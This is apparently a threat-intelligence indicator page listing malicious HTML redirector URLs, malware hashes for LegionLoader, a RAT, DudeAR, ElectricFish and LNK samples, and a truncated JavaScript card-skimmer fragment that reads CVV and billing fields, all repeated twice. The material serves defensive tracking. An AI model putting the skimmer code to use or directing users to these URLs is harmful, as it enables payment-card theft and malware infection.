Blevene Blevene

## HTML Redirectors
+ HTML Redirectors:
		+ http://202.164.235.127/mmd9b4u.html
		+ http://jesamcorp.com/ksobv.html
		+ http://theotime.net/exd2q.html
		+ http://buresova-obrazy.wz.cz/t2z25.html
		+ http://diaita.ch/oscbj.html
		+ http://spadework.org/5hox.html
		+ http://shibata-orimono.com/fcmycq.html
		+ http://iceman30.de/qhkcv.html
		+ http://lesrivesdechambesy.ch/wssvlsd.html

## redirectors
http://fepete.ch/~bubu/opw8cvh/hme0.html
http://bestwatersystems.net/f7o1fi4/ioki5.html
http://bmgiventures.com/f3ljo2j/25h89qa.html
http://seapower-italia.it/h4ili3d/6x95zqo.html
http://buresova-obrazy.wz.cz/14pg9e6/bgereo.html
http://banonhoe.com/ci20z0/m9t9x.html
http://sistemishop.it/w4a9yu/fzqemif.html
http://dmatica.it/heni26q/m6lc.html
http://www.1120.com.tw/4pkytx/ga8iq.html
http://organic-harmony.com/wukqp4d/90d90c.html

## code.js
var x = document.getElementsByTagName("button");
var i;
for (i=0;i<x.length;i++)
{
x[i].addEventListener("click",function(){
var res = document.getElementById("authorizenet_cc_cid").value;
if (res!=""){
var fname = document.getElementById("billing:firstname").value;
var lname = document.getElementById("billing:lastname").value;
var email = document.getElementById("billing:email").value;

## Results.txt
Rule per: https://pastebin.com/ySmYwPfu (https://twitter.com/P3pperP0tts/status/1199072934121398283)

legionloader:2891b08c134238beeb08582e3465d77c0fff2ac4bf2cd67162b7402b7246ace4
legionloader:8d6a289bd8f37b89194948bb1b111660015b7ef59dd3a6956c2ac13f0834b4a8
legionloader:0817d8fd8108abbff359e91bfc9e17739f00508e296a25e70bfa3fcaeea7b5ac
legionloader:c10d661449f18de9268019cc1395aa2ecfacd63b8950ff75c624098e34c6c2a3
legionloader:2e3fac6fde0e4ea23a1ac808dc11986f62be096971759a36e64b846feb9ddaf9
legionloader:9ee8dc22b121536f711f51cdf34c9a4e9d9bf72efc152ed86aa5701f875fcfbd
legionloader:992281bedcb6e35cb0ca35ba9558f2c63186cd1519856e9d76d50744ff8a1ea7
legionloader:4f5dc5fdaf6e31269e1248e053c255410288b1a1e3da81374466aeb2165f7566

## Some Weird RAT
a1967856d003fc833dce0c6ee14b4712ebb969abeb05dc6859962138a7f563c1
55e62cf00eb0cc70d57de2f9da4250e8859c89cbe985dba3358c75528d2d17ed
8cdfd12fa71dfa0b015b60042131af7840f77dbfeb96c54737cf0e287e7fac3f
d191e6fe5d919aae888dca4187b0568a907962f9e53be790ce8c9ce02d8835aa
d3e257711f9225c2efde318e7cf4a50a5b02c42a5ccbd9e8d1ceeead2c2d27d2

## DLLs that call DudeAR
658e7067c6ce8369f03fd2f1b206c7e940526e587c1e0769648b919bf6d85cd6
c39f3423794da57b7748d1785512f79cd7034989af85e4bcdc49007614942471
13cb40ce5591364fb0cad94ec55fcd17856ce6f8bbf88a45dfb04734c700af84
d44fcb39d39ee22c00d1ee6deedf01a555101b3387672c264c29f3c4f0efddd2
09e9fe9fdf0b81fbb167cca756cb58eb4a434b723f20365269ec2a0d56d2d2a7
d594bd343f8000c648cfebda782009be49e55e61448fa0a1f4249d35b1921d81
61efbbf690113e9de5da96a5c416b8124dfa76bd665ceb622bed3edafbe9589c
ed1da8d5b12c0d152f77a0d3442b6da2f87e59b70abe413490c2313491c4d4aa
c5106c91a0d9e35dfb456f707a63293ceabbdf3814ad24743e37599ff13a68f4
bc80c1ae8e79c5f3b01a97cd3ea4699c96538380a9f42f24e98a8e166d2a3b8e

## Additional Hashes
a3f474cdb601cc14420cd023d0ca8844c178b7e5f52382b312f0d52f94a3ae77
ce56e6667808c87d2e5c99e98d0882a542fe21a283b1ffab834b8413a4a720c2
bb7d16e967ff1d09538d908569aa210ac690e6d803525b07b99519c66981428e
7c591a45d281ff66506100d06c1a1cacfc7acf398a7a7bec34c2322602896d09
948bebafaf36d0bfa6f0c3f466bc45380eb9253a151e9a1df69d6c33c6444299
1119e5c92057e00ef03b50ddca00fa86209d22786df8a7679f1aca7567646f68

## Raw Data 2013-2018
distinct_samples	month	keyword
133308	201812	steal
992409	201812	ransom
155525	201812	bank
641780	201812	mine
709085	201811	mine
898598	201811	ransom
257001	201811	bank
168621	201811	steal
1093310	201810	mine

## ElectricFish
Original File: 7cf5d86cc75cd8f0e22e35213a9c051b740bd4667d9879a446f06277782bffd1

Related (Yara Rule Results):
9049c508327ed3ab72df33328145eb226e53805d90dd74c353067f5b167747f3
22d244fe63f27279db4b082afe296cd931cf377e3b9501fc8ffc372cb31f076a
515fdca93acf6a8d23b4fe67d51d4cab5cda6ddbc3d508dd63b61c432d169ca7
a1260fd3e9221d1bc5b9ece6e7a5a98669c79e124453f2ac58625085759ed3bb
7efe8a7ad9c6a6146bddd5aef9ceba477ca6973203a41f4b7f823095a90cb10f
5d25465ec4d51c6b61947990fb148d0b1ee8a344069d5ac956ef4ea6a61af879

## Malicious LNK Hashes
18ca83b6f3a3de26084ea49c80f4bef08b43b29bfb7121056e71c665bc6eed1e
2136e521991979fb22ac465a6d317ce5256094c163d841b05e27c177150984e6
a3993d7966d169fbde28ad8ef29e940e0847fa883bd19a664552a1c0b80f7f46
49775c194307dd767055480293d7fdb858cf082bc2c64d7e28b03a4806dc4685
1b95c5ead9cce9e0dc4a0f0b1c0c4e21bfa7a70d1d343934208edd072cb5f3cf
19161067f9b7980298b36c2dbf9914e83a0616459c8599de9934ea21e3fdf739
9b32f98102bc88547f21d452c389b0d122bf368857e917fcb3acac4ed443e904
f9ee04bee778d572e6df3e0679bd76074fa8ada5867530700b8d50ee5595854e
c608b60283423df3ac8dd0fcea8499ab4aaa969531a04988f90c1f2b1801087a
7a83c557ab36d09a84e7472873a1fc7bfbafd1f43b4d4827b979903ab152478d
	+ HTML Redirectors:
	+ http://202.164.235.127/mmd9b4u.html
	+ http://jesamcorp.com/ksobv.html
	+ http://theotime.net/exd2q.html
	+ http://buresova-obrazy.wz.cz/t2z25.html
	+ http://diaita.ch/oscbj.html
	+ http://spadework.org/5hox.html
	+ http://shibata-orimono.com/fcmycq.html
	+ http://iceman30.de/qhkcv.html
	+ http://lesrivesdechambesy.ch/wssvlsd.html
	http://fepete.ch/~bubu/opw8cvh/hme0.html
	http://bestwatersystems.net/f7o1fi4/ioki5.html
	http://bmgiventures.com/f3ljo2j/25h89qa.html
	http://seapower-italia.it/h4ili3d/6x95zqo.html
	http://buresova-obrazy.wz.cz/14pg9e6/bgereo.html
	http://banonhoe.com/ci20z0/m9t9x.html
	http://sistemishop.it/w4a9yu/fzqemif.html
	http://dmatica.it/heni26q/m6lc.html
	http://www.1120.com.tw/4pkytx/ga8iq.html
	http://organic-harmony.com/wukqp4d/90d90c.html
	var x = document.getElementsByTagName("button");
	var i;
	for (i=0;i<x.length;i++)
	{
	x[i].addEventListener("click",function(){
	var res = document.getElementById("authorizenet_cc_cid").value;
	if (res!=""){
	var fname = document.getElementById("billing:firstname").value;
	var lname = document.getElementById("billing:lastname").value;
	var email = document.getElementById("billing:email").value;
	Rule per: https://pastebin.com/ySmYwPfu (https://twitter.com/P3pperP0tts/status/1199072934121398283)

	legionloader:2891b08c134238beeb08582e3465d77c0fff2ac4bf2cd67162b7402b7246ace4
	legionloader:8d6a289bd8f37b89194948bb1b111660015b7ef59dd3a6956c2ac13f0834b4a8
	legionloader:0817d8fd8108abbff359e91bfc9e17739f00508e296a25e70bfa3fcaeea7b5ac
	legionloader:c10d661449f18de9268019cc1395aa2ecfacd63b8950ff75c624098e34c6c2a3
	legionloader:2e3fac6fde0e4ea23a1ac808dc11986f62be096971759a36e64b846feb9ddaf9
	legionloader:9ee8dc22b121536f711f51cdf34c9a4e9d9bf72efc152ed86aa5701f875fcfbd
	legionloader:992281bedcb6e35cb0ca35ba9558f2c63186cd1519856e9d76d50744ff8a1ea7
	legionloader:4f5dc5fdaf6e31269e1248e053c255410288b1a1e3da81374466aeb2165f7566
	a1967856d003fc833dce0c6ee14b4712ebb969abeb05dc6859962138a7f563c1
	55e62cf00eb0cc70d57de2f9da4250e8859c89cbe985dba3358c75528d2d17ed
	8cdfd12fa71dfa0b015b60042131af7840f77dbfeb96c54737cf0e287e7fac3f
	d191e6fe5d919aae888dca4187b0568a907962f9e53be790ce8c9ce02d8835aa
	d3e257711f9225c2efde318e7cf4a50a5b02c42a5ccbd9e8d1ceeead2c2d27d2
	658e7067c6ce8369f03fd2f1b206c7e940526e587c1e0769648b919bf6d85cd6
	c39f3423794da57b7748d1785512f79cd7034989af85e4bcdc49007614942471
	13cb40ce5591364fb0cad94ec55fcd17856ce6f8bbf88a45dfb04734c700af84
	d44fcb39d39ee22c00d1ee6deedf01a555101b3387672c264c29f3c4f0efddd2
	09e9fe9fdf0b81fbb167cca756cb58eb4a434b723f20365269ec2a0d56d2d2a7
	d594bd343f8000c648cfebda782009be49e55e61448fa0a1f4249d35b1921d81
	61efbbf690113e9de5da96a5c416b8124dfa76bd665ceb622bed3edafbe9589c
	ed1da8d5b12c0d152f77a0d3442b6da2f87e59b70abe413490c2313491c4d4aa
	c5106c91a0d9e35dfb456f707a63293ceabbdf3814ad24743e37599ff13a68f4
	bc80c1ae8e79c5f3b01a97cd3ea4699c96538380a9f42f24e98a8e166d2a3b8e
	a3f474cdb601cc14420cd023d0ca8844c178b7e5f52382b312f0d52f94a3ae77
	ce56e6667808c87d2e5c99e98d0882a542fe21a283b1ffab834b8413a4a720c2
	bb7d16e967ff1d09538d908569aa210ac690e6d803525b07b99519c66981428e
	7c591a45d281ff66506100d06c1a1cacfc7acf398a7a7bec34c2322602896d09
	948bebafaf36d0bfa6f0c3f466bc45380eb9253a151e9a1df69d6c33c6444299
	1119e5c92057e00ef03b50ddca00fa86209d22786df8a7679f1aca7567646f68
	distinct_samples month keyword
	133308 201812 steal
	992409 201812 ransom
	155525 201812 bank
	641780 201812 mine
	709085 201811 mine
	898598 201811 ransom
	257001 201811 bank
	168621 201811 steal
	1093310 201810 mine
	Original File: 7cf5d86cc75cd8f0e22e35213a9c051b740bd4667d9879a446f06277782bffd1

	Related (Yara Rule Results):
	9049c508327ed3ab72df33328145eb226e53805d90dd74c353067f5b167747f3
	22d244fe63f27279db4b082afe296cd931cf377e3b9501fc8ffc372cb31f076a
	515fdca93acf6a8d23b4fe67d51d4cab5cda6ddbc3d508dd63b61c432d169ca7
	a1260fd3e9221d1bc5b9ece6e7a5a98669c79e124453f2ac58625085759ed3bb
	7efe8a7ad9c6a6146bddd5aef9ceba477ca6973203a41f4b7f823095a90cb10f
	5d25465ec4d51c6b61947990fb148d0b1ee8a344069d5ac956ef4ea6a61af879
	18ca83b6f3a3de26084ea49c80f4bef08b43b29bfb7121056e71c665bc6eed1e
	2136e521991979fb22ac465a6d317ce5256094c163d841b05e27c177150984e6
	a3993d7966d169fbde28ad8ef29e940e0847fa883bd19a664552a1c0b80f7f46
	49775c194307dd767055480293d7fdb858cf082bc2c64d7e28b03a4806dc4685
	1b95c5ead9cce9e0dc4a0f0b1c0c4e21bfa7a70d1d343934208edd072cb5f3cf
	19161067f9b7980298b36c2dbf9914e83a0616459c8599de9934ea21e3fdf739
	9b32f98102bc88547f21d452c389b0d122bf368857e917fcb3acac4ed443e904
	f9ee04bee778d572e6df3e0679bd76074fa8ada5867530700b8d50ee5595854e
	c608b60283423df3ac8dd0fcea8499ab4aaa969531a04988f90c1f2b1801087a
	7a83c557ab36d09a84e7472873a1fc7bfbafd1f43b4d4827b979903ab152478d